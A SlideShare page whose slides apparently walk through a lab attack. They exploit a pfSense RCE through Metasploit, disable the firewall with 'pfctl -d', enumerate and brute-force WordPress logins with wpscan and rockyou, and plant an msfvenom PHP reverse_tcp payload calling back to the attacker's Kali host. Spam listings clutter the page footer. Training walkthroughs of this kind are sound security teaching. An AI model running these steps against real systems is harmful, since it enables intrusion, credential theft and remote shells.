SlideShare a Scribd company logo

Bypass pfsense

Download as PPTX, PDF
S
SalmenHAJJI1

How to access a private network and get WordPress by bypassing Pfsense firewall

Internet
1 of 34
1
2
3 WPSCAN WPScan is a black box WordPress vulnerability scanner Tools
LAN address 10.10.10.1 WAN address 10.10.10.11 Concept 4 192.168.1.x 10.10.10.0
Title and Content Layout with List • Add your first bullet point here • Add your second bullet point here • Add your third bullet point here 5
? A free and open source operating system for routers and firewalls Can be installed on a physical computer or a virtual machine to make a dedicated firewall/router for a network Configured as DHCP server, DNS server, WIFI access point, VPN server, all running on the same hardware device. 6
7
Looking for the PfSense’s exploit 8
pfSense authenticated graph status RCE Looking for the PfSense’s exploit 8 Tricking an authenticated admin into interacting with a specially crafted webpage Click jacking Vulnerability In CSRF Error Page pfSense PfSense authenticated graph status RCE A non-administrative authenticated attacker can inject arbitrary operating system commands and execute them as the root user PfSense authenticated group member RCE A remote command execution vulnerability post authentication in the system_groupmanager.php page
Change the exploit’s options 9
Change the exploit’s options 9 Rhost = IP address of PFSENSE Lhost = IP address of KALI
Run the exploit 10
Get the internal address of Pfsense 10
Ping & scan the internal address of PFSENSE 11  Nmap –sP @ip Ping Scan ip LAN pfsense
Can't reach the internal IP of the firewall 12
Bypass pfsense 13
Reconfigure our gateway in Kali 14
Disable the rules of PFSENSE 15 Pfctl –d Disable the packet filter
Change the default administrator password of PFSENSE 16
Ping the internal IP address 17
Scan with nmap both the Ubuntu & PfSense 18
we can ping the internal IP of pfsense And by nmap we found Now we can ping the internal IP of pfsense And by nmap we have found that both PFSENSE and UBUNTU are UP !!! 19
20
we can ping the internal IP of pfsense And by nmap we found Scan WordPress version with Wpscan 21  Wpscan –url The url of the blog to scan
we can ping the internal IP of pfsense And by nmap we found Scan WordPress version with Wpscan 22
Enumerate WordPress Usernames 23  Wpscan –url http://x.x.x.x -e u enumerate users
Enumerate WordPress Usernames 24
Brut force attack using Wpscan 25 rockyou wordlist: is a password dictionary that exist by default in kali linux
Brut force attack using Wpscan 26  Wpscan –url http://x.x.x.x –U admin –P /usr/share/wordlists/rockyou.txt username and list of password to use during the attack
Generate malicious PHP script 27 msfvenom is a combination of : • msfpayload (generate a payload in a specified format ) • msfencode (encode and obfuscate the payload using various algorithms)  Msfvenom –p php/meterpreter/reverse_tcp lhost=@kali lport=4444 –f raw payload to use format
Connect to Wordpress & Paste the PHP script under 404,php template 28
ss Load Metasploit and start multi/handler  Use exploit/multi/handler a stub that handles exploits launched outside of the framework. 29
we can ping the internal IP of pfsense And by nmap we found THANK YOU FOR YOUR TIME

Recommended

Detect HTTP Brute Force attack using Snort IDS/IPS on PFSense Firewall
Detect HTTP Brute Force attack using Snort IDS/IPS on PFSense FirewallDetect HTTP Brute Force attack using Snort IDS/IPS on PFSense Firewall
Detect HTTP Brute Force attack using Snort IDS/IPS on PFSense FirewallHuda Seyam
 
IGMP
IGMPIGMP
IGMPRaghavendra Hamilpure
 
Some Tatbikatları ve SIEM Testleri İçin Siber Saldırıları Nasıl Optimize Ederiz?
Some Tatbikatları ve SIEM Testleri İçin Siber Saldırıları Nasıl Optimize Ederiz?Some Tatbikatları ve SIEM Testleri İçin Siber Saldırıları Nasıl Optimize Ederiz?
Some Tatbikatları ve SIEM Testleri İçin Siber Saldırıları Nasıl Optimize Ederiz?BGA Cyber Security
 
Hping Kullanarak Ağ Keşif Çalışmaları
Hping Kullanarak Ağ Keşif ÇalışmalarıHping Kullanarak Ağ Keşif Çalışmaları
Hping Kullanarak Ağ Keşif ÇalışmalarıBGA Cyber Security
 
IPS (intrusion prevention system)
IPS (intrusion prevention system)IPS (intrusion prevention system)
IPS (intrusion prevention system)Netwax Lab
 
PRTG NETWORK MONITORING
PRTG NETWORK MONITORINGPRTG NETWORK MONITORING
PRTG NETWORK MONITORINGFanky Christian
 
wifi aware
wifi aware wifi aware
wifi awarereshmi haridas
 
BIG IP F5 GTM Presentation
BIG IP F5 GTM PresentationBIG IP F5 GTM Presentation
BIG IP F5 GTM PresentationPCCW GLOBAL
 

Recommended

Detect HTTP Brute Force attack using Snort IDS/IPS on PFSense Firewall
Detect HTTP Brute Force attack using Snort IDS/IPS on PFSense FirewallDetect HTTP Brute Force attack using Snort IDS/IPS on PFSense Firewall
Detect HTTP Brute Force attack using Snort IDS/IPS on PFSense FirewallHuda Seyam
 
IGMP
IGMPIGMP
IGMPRaghavendra Hamilpure
 
Some Tatbikatları ve SIEM Testleri İçin Siber Saldırıları Nasıl Optimize Ederiz?
Some Tatbikatları ve SIEM Testleri İçin Siber Saldırıları Nasıl Optimize Ederiz?Some Tatbikatları ve SIEM Testleri İçin Siber Saldırıları Nasıl Optimize Ederiz?
Some Tatbikatları ve SIEM Testleri İçin Siber Saldırıları Nasıl Optimize Ederiz?BGA Cyber Security
 
Hping Kullanarak Ağ Keşif Çalışmaları
Hping Kullanarak Ağ Keşif ÇalışmalarıHping Kullanarak Ağ Keşif Çalışmaları
Hping Kullanarak Ağ Keşif ÇalışmalarıBGA Cyber Security
 
IPS (intrusion prevention system)
IPS (intrusion prevention system)IPS (intrusion prevention system)
IPS (intrusion prevention system)Netwax Lab
 
PRTG NETWORK MONITORING
PRTG NETWORK MONITORINGPRTG NETWORK MONITORING
PRTG NETWORK MONITORINGFanky Christian
 
wifi aware
wifi aware wifi aware
wifi awarereshmi haridas
 
BIG IP F5 GTM Presentation
BIG IP F5 GTM PresentationBIG IP F5 GTM Presentation
BIG IP F5 GTM PresentationPCCW GLOBAL
 
Chassis Cluster Configuration
Chassis Cluster ConfigurationChassis Cluster Configuration
Chassis Cluster ConfigurationKashif Latif
 
Snort Intrusion Detection / Prevention System on PFSense Firewall
Snort Intrusion Detection / Prevention System on PFSense FirewallSnort Intrusion Detection / Prevention System on PFSense Firewall
Snort Intrusion Detection / Prevention System on PFSense FirewallHuda Seyam
 
Splunk Data Onboarding Overview - Splunk Data Collection Architecture
Splunk Data Onboarding Overview - Splunk Data Collection ArchitectureSplunk Data Onboarding Overview - Splunk Data Collection Architecture
Splunk Data Onboarding Overview - Splunk Data Collection ArchitectureSplunk
 
Firewall Endian
Firewall EndianFirewall Endian
Firewall EndianFouad Root
 
WAF 101
WAF 101WAF 101
WAF 101Null Bhubaneswar
 
Tcpdump ile Trafik Analizi(Sniffing)
Tcpdump ile Trafik Analizi(Sniffing)Tcpdump ile Trafik Analizi(Sniffing)
Tcpdump ile Trafik Analizi(Sniffing)BGA Cyber Security
 
macvlan and ipvlan
macvlan and ipvlanmacvlan and ipvlan
macvlan and ipvlanSuraj Deshmukh
 
Packet tracer
Packet tracerPacket tracer
Packet tracerImdad Ullah
 
Vpn site to site
Vpn site to siteVpn site to site
Vpn site to siteIT Tech
 
Docker Networking with New Ipvlan and Macvlan Drivers
Docker Networking with New Ipvlan and Macvlan DriversDocker Networking with New Ipvlan and Macvlan Drivers
Docker Networking with New Ipvlan and Macvlan DriversBrent Salisbury
 
Putting Firepower Into The Next Generation Firewall
Putting Firepower Into The Next Generation FirewallPutting Firepower Into The Next Generation Firewall
Putting Firepower Into The Next Generation FirewallCisco Canada
 
Metasploit
MetasploitMetasploit
MetasploitCristian Alejandro Rojas Quintero
 
pfSense Firewall ve Router Eğitimi
pfSense Firewall ve Router EğitimipfSense Firewall ve Router Eğitimi
pfSense Firewall ve Router EğitimiBGA Cyber Security
 
Network Security - Fortinet, Dublin June 2017
Network Security - Fortinet, Dublin June 2017Network Security - Fortinet, Dublin June 2017
Network Security - Fortinet, Dublin June 2017Novosco
 
Mrtg ubuntu
Mrtg ubuntuMrtg ubuntu
Mrtg ubuntuCheli Hedz
 
CCNA 200-301 VOLUME 2.pdf
CCNA 200-301 VOLUME 2.pdfCCNA 200-301 VOLUME 2.pdf
CCNA 200-301 VOLUME 2.pdfbekhti
 
Introduction to IPv6
Introduction to IPv6Introduction to IPv6
Introduction to IPv6Sara Q. Abedulridha
 
Alphorm.com Support de la Formation Stormshield Administration
Alphorm.com Support de la Formation Stormshield AdministrationAlphorm.com Support de la Formation Stormshield Administration
Alphorm.com Support de la Formation Stormshield AdministrationAlphorm
 
pfSense presentation
pfSense presentationpfSense presentation
pfSense presentationSimon Vass
 
VMworld 2017 vSAN Network Design
VMworld 2017 vSAN Network Design VMworld 2017 vSAN Network Design
VMworld 2017 vSAN Network Design Cormac Hogan
 
document.pptx
document.pptxdocument.pptx
document.pptxjosephLak
 
PHP Project development with Vagrant
PHP Project development with VagrantPHP Project development with Vagrant
PHP Project development with VagrantBahattin Çiniç
 

More Related Content

What's hot

Chassis Cluster Configuration
Chassis Cluster ConfigurationChassis Cluster Configuration
Chassis Cluster ConfigurationKashif Latif
 
Snort Intrusion Detection / Prevention System on PFSense Firewall
Snort Intrusion Detection / Prevention System on PFSense FirewallSnort Intrusion Detection / Prevention System on PFSense Firewall
Snort Intrusion Detection / Prevention System on PFSense FirewallHuda Seyam
 
Splunk Data Onboarding Overview - Splunk Data Collection Architecture
Splunk Data Onboarding Overview - Splunk Data Collection ArchitectureSplunk Data Onboarding Overview - Splunk Data Collection Architecture
Splunk Data Onboarding Overview - Splunk Data Collection ArchitectureSplunk
 
Firewall Endian
Firewall EndianFirewall Endian
Firewall EndianFouad Root
 
Tcpdump ile Trafik Analizi(Sniffing)
Tcpdump ile Trafik Analizi(Sniffing)Tcpdump ile Trafik Analizi(Sniffing)
Tcpdump ile Trafik Analizi(Sniffing)BGA Cyber Security
 
Vpn site to site
Vpn site to siteVpn site to site
Vpn site to siteIT Tech
 
Docker Networking with New Ipvlan and Macvlan Drivers
Docker Networking with New Ipvlan and Macvlan DriversDocker Networking with New Ipvlan and Macvlan Drivers
Docker Networking with New Ipvlan and Macvlan DriversBrent Salisbury
 
Putting Firepower Into The Next Generation Firewall
Putting Firepower Into The Next Generation FirewallPutting Firepower Into The Next Generation Firewall
Putting Firepower Into The Next Generation FirewallCisco Canada
 
pfSense Firewall ve Router Eğitimi
pfSense Firewall ve Router EğitimipfSense Firewall ve Router Eğitimi
pfSense Firewall ve Router EğitimiBGA Cyber Security
 
Network Security - Fortinet, Dublin June 2017
Network Security - Fortinet, Dublin June 2017Network Security - Fortinet, Dublin June 2017
Network Security - Fortinet, Dublin June 2017Novosco
 
CCNA 200-301 VOLUME 2.pdf
CCNA 200-301 VOLUME 2.pdfCCNA 200-301 VOLUME 2.pdf
CCNA 200-301 VOLUME 2.pdfbekhti
 
Alphorm.com Support de la Formation Stormshield Administration
Alphorm.com Support de la Formation Stormshield AdministrationAlphorm.com Support de la Formation Stormshield Administration
Alphorm.com Support de la Formation Stormshield AdministrationAlphorm
 
pfSense presentation
pfSense presentationpfSense presentation
pfSense presentationSimon Vass
 
VMworld 2017 vSAN Network Design
VMworld 2017 vSAN Network Design VMworld 2017 vSAN Network Design
VMworld 2017 vSAN Network Design Cormac Hogan
 

What's hot (20)

Chassis Cluster Configuration
Chassis Cluster ConfigurationChassis Cluster Configuration
Chassis Cluster Configuration
 
Snort Intrusion Detection / Prevention System on PFSense Firewall
Snort Intrusion Detection / Prevention System on PFSense FirewallSnort Intrusion Detection / Prevention System on PFSense Firewall
Snort Intrusion Detection / Prevention System on PFSense Firewall
 
Splunk Data Onboarding Overview - Splunk Data Collection Architecture
Splunk Data Onboarding Overview - Splunk Data Collection ArchitectureSplunk Data Onboarding Overview - Splunk Data Collection Architecture
Splunk Data Onboarding Overview - Splunk Data Collection Architecture
 
Firewall Endian
Firewall EndianFirewall Endian
Firewall Endian
 
WAF 101
WAF 101WAF 101
WAF 101
 
Tcpdump ile Trafik Analizi(Sniffing)
Tcpdump ile Trafik Analizi(Sniffing)Tcpdump ile Trafik Analizi(Sniffing)
Tcpdump ile Trafik Analizi(Sniffing)
 
macvlan and ipvlan
macvlan and ipvlanmacvlan and ipvlan
macvlan and ipvlan
 
Packet tracer
Packet tracerPacket tracer
Packet tracer
 
Vpn site to site
Vpn site to siteVpn site to site
Vpn site to site
 
Docker Networking with New Ipvlan and Macvlan Drivers
Docker Networking with New Ipvlan and Macvlan DriversDocker Networking with New Ipvlan and Macvlan Drivers
Docker Networking with New Ipvlan and Macvlan Drivers
 
Putting Firepower Into The Next Generation Firewall
Putting Firepower Into The Next Generation FirewallPutting Firepower Into The Next Generation Firewall
Putting Firepower Into The Next Generation Firewall
 
Metasploit
MetasploitMetasploit
Metasploit
 
pfSense Firewall ve Router Eğitimi
pfSense Firewall ve Router EğitimipfSense Firewall ve Router Eğitimi
pfSense Firewall ve Router Eğitimi
 
Network Security - Fortinet, Dublin June 2017
Network Security - Fortinet, Dublin June 2017Network Security - Fortinet, Dublin June 2017
Network Security - Fortinet, Dublin June 2017
 
Mrtg ubuntu
Mrtg ubuntuMrtg ubuntu
Mrtg ubuntu
 
CCNA 200-301 VOLUME 2.pdf
CCNA 200-301 VOLUME 2.pdfCCNA 200-301 VOLUME 2.pdf
CCNA 200-301 VOLUME 2.pdf
 
Introduction to IPv6
Introduction to IPv6Introduction to IPv6
Introduction to IPv6
 
Alphorm.com Support de la Formation Stormshield Administration
Alphorm.com Support de la Formation Stormshield AdministrationAlphorm.com Support de la Formation Stormshield Administration
Alphorm.com Support de la Formation Stormshield Administration
 
pfSense presentation
pfSense presentationpfSense presentation
pfSense presentation
 
VMworld 2017 vSAN Network Design
VMworld 2017 vSAN Network Design VMworld 2017 vSAN Network Design
VMworld 2017 vSAN Network Design
 

Similar to Bypass pfsense

document.pptx
document.pptxdocument.pptx
document.pptxjosephLak
 
PHP Project development with Vagrant
PHP Project development with VagrantPHP Project development with Vagrant
PHP Project development with VagrantBahattin Çiniç
 
Installing Lamp Stack on Ubuntu Instance
Installing Lamp Stack on Ubuntu InstanceInstalling Lamp Stack on Ubuntu Instance
Installing Lamp Stack on Ubuntu Instancekamarul kawnayeen
 
Nagios Conference 2011 - Mike Weber - Training: Monitoring Linux Mail Servers...
Nagios Conference 2011 - Mike Weber - Training: Monitoring Linux Mail Servers...Nagios Conference 2011 - Mike Weber - Training: Monitoring Linux Mail Servers...
Nagios Conference 2011 - Mike Weber - Training: Monitoring Linux Mail Servers...Nagios
 
Module 5 Sniffers
Module 5 SniffersModule 5 Sniffers
Module 5 Sniffersleminhvuong
 
ShellShock (Software BASH Bug)
ShellShock (Software BASH Bug)ShellShock (Software BASH Bug)
ShellShock (Software BASH Bug)ViSolve, Inc.
 
Assessment itemManaging Services and SecurityValue 15Due D.docx
Assessment itemManaging Services and SecurityValue 15Due D.docxAssessment itemManaging Services and SecurityValue 15Due D.docx
Assessment itemManaging Services and SecurityValue 15Due D.docxgalerussel59292
 
Integrated Tools in OSSIM
Integrated Tools in OSSIMIntegrated Tools in OSSIM
Integrated Tools in OSSIMAlienVault
 
Rasperry pi Part 12
Rasperry pi Part 12Rasperry pi Part 12
Rasperry pi Part 12Techvilla
 
The Indicators of Compromise
The Indicators of CompromiseThe Indicators of Compromise
The Indicators of CompromiseTomasz Jakubowski
 
Automated Malware Analysis
Automated Malware AnalysisAutomated Malware Analysis
Automated Malware AnalysisPushkar Pashupat
 
0xsp mongoose RED - DragonCon HK
0xsp mongoose RED - DragonCon HK0xsp mongoose RED - DragonCon HK
0xsp mongoose RED - DragonCon HKLawrence Amer
 
Web Application Security Testing: Kali Linux Is the Way to Go
Web Application Security Testing: Kali Linux Is the Way to GoWeb Application Security Testing: Kali Linux Is the Way to Go
Web Application Security Testing: Kali Linux Is the Way to GoGene Gotimer
 
Web Application Security Testing: Kali Linux Is the Way to Go
Web Application Security Testing: Kali Linux Is the Way to Go Web Application Security Testing: Kali Linux Is the Way to Go
Web Application Security Testing: Kali Linux Is the Way to Go Coveros, Inc.
 
40 Methods for Privilege Escalation Part 1
40 Methods for Privilege Escalation Part 140 Methods for Privilege Escalation Part 1
40 Methods for Privilege Escalation Part 1Hadess
 
Methods for Privilege Escalation Part One.pdf
Methods for Privilege Escalation Part One.pdfMethods for Privilege Escalation Part One.pdf
Methods for Privilege Escalation Part One.pdfrimaNova1
 
Create Development and Production Environments with Vagrant
Create Development and Production Environments with VagrantCreate Development and Production Environments with Vagrant
Create Development and Production Environments with VagrantBrian Hogan
 
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisInside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisChong-Kuan Chen
 

Similar to Bypass pfsense (20)

document.pptx
document.pptxdocument.pptx
document.pptx
 
PHP Project development with Vagrant
PHP Project development with VagrantPHP Project development with Vagrant
PHP Project development with Vagrant
 
Installing Lamp Stack on Ubuntu Instance
Installing Lamp Stack on Ubuntu InstanceInstalling Lamp Stack on Ubuntu Instance
Installing Lamp Stack on Ubuntu Instance
 
Pentest and Security Discussion
Pentest and Security DiscussionPentest and Security Discussion
Pentest and Security Discussion
 
Nagios Conference 2011 - Mike Weber - Training: Monitoring Linux Mail Servers...
Nagios Conference 2011 - Mike Weber - Training: Monitoring Linux Mail Servers...Nagios Conference 2011 - Mike Weber - Training: Monitoring Linux Mail Servers...
Nagios Conference 2011 - Mike Weber - Training: Monitoring Linux Mail Servers...
 
Module 5 Sniffers
Module 5 SniffersModule 5 Sniffers
Module 5 Sniffers
 
ShellShock (Software BASH Bug)
ShellShock (Software BASH Bug)ShellShock (Software BASH Bug)
ShellShock (Software BASH Bug)
 
Assessment itemManaging Services and SecurityValue 15Due D.docx
Assessment itemManaging Services and SecurityValue 15Due D.docxAssessment itemManaging Services and SecurityValue 15Due D.docx
Assessment itemManaging Services and SecurityValue 15Due D.docx
 
Integrated Tools in OSSIM
Integrated Tools in OSSIMIntegrated Tools in OSSIM
Integrated Tools in OSSIM
 
Rasperry pi Part 12
Rasperry pi Part 12Rasperry pi Part 12
Rasperry pi Part 12
 
The Indicators of Compromise
The Indicators of CompromiseThe Indicators of Compromise
The Indicators of Compromise
 
Presentación1
Presentación1Presentación1
Presentación1
 
Automated Malware Analysis
Automated Malware AnalysisAutomated Malware Analysis
Automated Malware Analysis
 
0xsp mongoose RED - DragonCon HK
0xsp mongoose RED - DragonCon HK0xsp mongoose RED - DragonCon HK
0xsp mongoose RED - DragonCon HK
 
Web Application Security Testing: Kali Linux Is the Way to Go
Web Application Security Testing: Kali Linux Is the Way to GoWeb Application Security Testing: Kali Linux Is the Way to Go
Web Application Security Testing: Kali Linux Is the Way to Go
 
Web Application Security Testing: Kali Linux Is the Way to Go
Web Application Security Testing: Kali Linux Is the Way to Go Web Application Security Testing: Kali Linux Is the Way to Go
Web Application Security Testing: Kali Linux Is the Way to Go
 
40 Methods for Privilege Escalation Part 1
40 Methods for Privilege Escalation Part 140 Methods for Privilege Escalation Part 1
40 Methods for Privilege Escalation Part 1
 
Methods for Privilege Escalation Part One.pdf
Methods for Privilege Escalation Part One.pdfMethods for Privilege Escalation Part One.pdf
Methods for Privilege Escalation Part One.pdf
 
Create Development and Production Environments with Vagrant
Create Development and Production Environments with VagrantCreate Development and Production Environments with Vagrant
Create Development and Production Environments with Vagrant
 
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisInside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
 

More from SalmenHAJJI1

Ccna security v2 instructor_ppt_ch11
Ccna security v2 instructor_ppt_ch11Ccna security v2 instructor_ppt_ch11
Ccna security v2 instructor_ppt_ch11SalmenHAJJI1
 
Ccna security v2 instructor_ppt_ch10
Ccna security v2 instructor_ppt_ch10Ccna security v2 instructor_ppt_ch10
Ccna security v2 instructor_ppt_ch10SalmenHAJJI1
 
Ccna sv2 instructor_ppt_ch9
Ccna sv2 instructor_ppt_ch9Ccna sv2 instructor_ppt_ch9
Ccna sv2 instructor_ppt_ch9SalmenHAJJI1
 
Ccna sv2 instructor_ppt_ch8
Ccna sv2 instructor_ppt_ch8Ccna sv2 instructor_ppt_ch8
Ccna sv2 instructor_ppt_ch8SalmenHAJJI1
 
Ccna sv2 instructor_ppt_ch7
Ccna sv2 instructor_ppt_ch7Ccna sv2 instructor_ppt_ch7
Ccna sv2 instructor_ppt_ch7SalmenHAJJI1
 
Ccna sv2 instructor_ppt_ch6
Ccna sv2 instructor_ppt_ch6Ccna sv2 instructor_ppt_ch6
Ccna sv2 instructor_ppt_ch6SalmenHAJJI1
 
Ccna sv2 instructor_ppt_ch5
Ccna sv2 instructor_ppt_ch5Ccna sv2 instructor_ppt_ch5
Ccna sv2 instructor_ppt_ch5SalmenHAJJI1
 
Ccna sv2 instructor_ppt_ch4
Ccna sv2 instructor_ppt_ch4Ccna sv2 instructor_ppt_ch4
Ccna sv2 instructor_ppt_ch4SalmenHAJJI1
 
Ccna sv2 instructor_ppt_ch3
Ccna sv2 instructor_ppt_ch3Ccna sv2 instructor_ppt_ch3
Ccna sv2 instructor_ppt_ch3SalmenHAJJI1
 
Ccna sv2 instructor_ppt_ch2
Ccna sv2 instructor_ppt_ch2Ccna sv2 instructor_ppt_ch2
Ccna sv2 instructor_ppt_ch2SalmenHAJJI1
 
Ccna sv2 instructor_ppt_ch1
Ccna sv2 instructor_ppt_ch1Ccna sv2 instructor_ppt_ch1
Ccna sv2 instructor_ppt_ch1SalmenHAJJI1
 
Smart Library using Face Recognition
Smart Library using Face Recognition Smart Library using Face Recognition
Smart Library using Face Recognition SalmenHAJJI1
 

More from SalmenHAJJI1 (13)

Ccna security v2 instructor_ppt_ch11
Ccna security v2 instructor_ppt_ch11Ccna security v2 instructor_ppt_ch11
Ccna security v2 instructor_ppt_ch11
 
Ccna security v2 instructor_ppt_ch10
Ccna security v2 instructor_ppt_ch10Ccna security v2 instructor_ppt_ch10
Ccna security v2 instructor_ppt_ch10
 
Ccna sv2 instructor_ppt_ch9
Ccna sv2 instructor_ppt_ch9Ccna sv2 instructor_ppt_ch9
Ccna sv2 instructor_ppt_ch9
 
Ccna sv2 instructor_ppt_ch8
Ccna sv2 instructor_ppt_ch8Ccna sv2 instructor_ppt_ch8
Ccna sv2 instructor_ppt_ch8
 
Ccna sv2 instructor_ppt_ch7
Ccna sv2 instructor_ppt_ch7Ccna sv2 instructor_ppt_ch7
Ccna sv2 instructor_ppt_ch7
 
Ccna sv2 instructor_ppt_ch6
Ccna sv2 instructor_ppt_ch6Ccna sv2 instructor_ppt_ch6
Ccna sv2 instructor_ppt_ch6
 
Ccna sv2 instructor_ppt_ch5
Ccna sv2 instructor_ppt_ch5Ccna sv2 instructor_ppt_ch5
Ccna sv2 instructor_ppt_ch5
 
Ccna sv2 instructor_ppt_ch4
Ccna sv2 instructor_ppt_ch4Ccna sv2 instructor_ppt_ch4
Ccna sv2 instructor_ppt_ch4
 
Ccna sv2 instructor_ppt_ch3
Ccna sv2 instructor_ppt_ch3Ccna sv2 instructor_ppt_ch3
Ccna sv2 instructor_ppt_ch3
 
Ccna sv2 instructor_ppt_ch2
Ccna sv2 instructor_ppt_ch2Ccna sv2 instructor_ppt_ch2
Ccna sv2 instructor_ppt_ch2
 
Ccna sv2 instructor_ppt_ch1
Ccna sv2 instructor_ppt_ch1Ccna sv2 instructor_ppt_ch1
Ccna sv2 instructor_ppt_ch1
 
Smart Library using Face Recognition
Smart Library using Face Recognition Smart Library using Face Recognition
Smart Library using Face Recognition
 
Lora and LoraWan
Lora and LoraWanLora and LoraWan
Lora and LoraWan
 

Recently uploaded

VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Room
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With RoomVIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Room
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Roomdivyansh0kumar0
 
VIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call Girl
VIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call GirlVIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call Girl
VIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call Girladitipandeya
 
How is AI changing journalism? (v. April 2024)
How is AI changing journalism? (v. April 2024)How is AI changing journalism? (v. April 2024)
How is AI changing journalism? (v. April 2024)Damian Radcliffe
 
Russian Call Girls Thane Swara 8617697112 Independent Escort Service Thane
Russian Call Girls Thane Swara 8617697112 Independent Escort Service ThaneRussian Call Girls Thane Swara 8617697112 Independent Escort Service Thane
Russian Call Girls Thane Swara 8617697112 Independent Escort Service ThaneCall girls in Ahmedabad High profile
 
VIP 7001035870 Find & Meet Hyderabad Call Girls Dilsukhnagar high-profile Cal...
VIP 7001035870 Find & Meet Hyderabad Call Girls Dilsukhnagar high-profile Cal...VIP 7001035870 Find & Meet Hyderabad Call Girls Dilsukhnagar high-profile Cal...
VIP 7001035870 Find & Meet Hyderabad Call Girls Dilsukhnagar high-profile Cal...aditipandeya
 
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts serviceChennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts servicevipmodelshub1
 
VIP Kolkata Call Girl Dum Dum 👉 8250192130 Available With Room
VIP Kolkata Call Girl Dum Dum 👉 8250192130 Available With RoomVIP Kolkata Call Girl Dum Dum 👉 8250192130 Available With Room
VIP Kolkata Call Girl Dum Dum 👉 8250192130 Available With Roomdivyansh0kumar0
 
Challengers I Told Ya ShirtChallengers I Told Ya Shirt
Challengers I Told Ya ShirtChallengers I Told Ya ShirtChallengers I Told Ya ShirtChallengers I Told Ya Shirt
Challengers I Told Ya ShirtChallengers I Told Ya Shirtrahman018755
 
GDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark Web
GDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark WebGDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark Web
GDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark WebJames Anderson
 
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip CallDelhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Callshivangimorya083
 
On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024APNIC
 
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝soniya singh
 
Radiant Call girls in Dubai O56338O268 Dubai Call girls
Radiant Call girls in Dubai O56338O268 Dubai Call girlsRadiant Call girls in Dubai O56338O268 Dubai Call girls
Radiant Call girls in Dubai O56338O268 Dubai Call girlsstephieert
 
Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝soniya singh
 
Networking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOGNetworking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOGAPNIC
 
Moving Beyond Twitter/X and Facebook - Social Media for local news providers
Moving Beyond Twitter/X and Facebook - Social Media for local news providersMoving Beyond Twitter/X and Facebook - Social Media for local news providers
Moving Beyond Twitter/X and Facebook - Social Media for local news providersDamian Radcliffe
 
Gram Darshan PPT cyber rural in villages of india
Gram Darshan PPT cyber rural in villages of indiaGram Darshan PPT cyber rural in villages of india
Gram Darshan PPT cyber rural in villages of indiaimessage0108
 
VIP Kolkata Call Girls Salt Lake 8250192130 Available With Room
VIP Kolkata Call Girls Salt Lake 8250192130 Available With RoomVIP Kolkata Call Girls Salt Lake 8250192130 Available With Room
VIP Kolkata Call Girls Salt Lake 8250192130 Available With Roomgirls4nights
 
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...Diya Sharma
 

Recently uploaded (20)

VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Room
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With RoomVIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Room
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Room
 
VIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call Girl
VIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call GirlVIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call Girl
VIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call Girl
 
How is AI changing journalism? (v. April 2024)
How is AI changing journalism? (v. April 2024)How is AI changing journalism? (v. April 2024)
How is AI changing journalism? (v. April 2024)
 
Russian Call Girls Thane Swara 8617697112 Independent Escort Service Thane
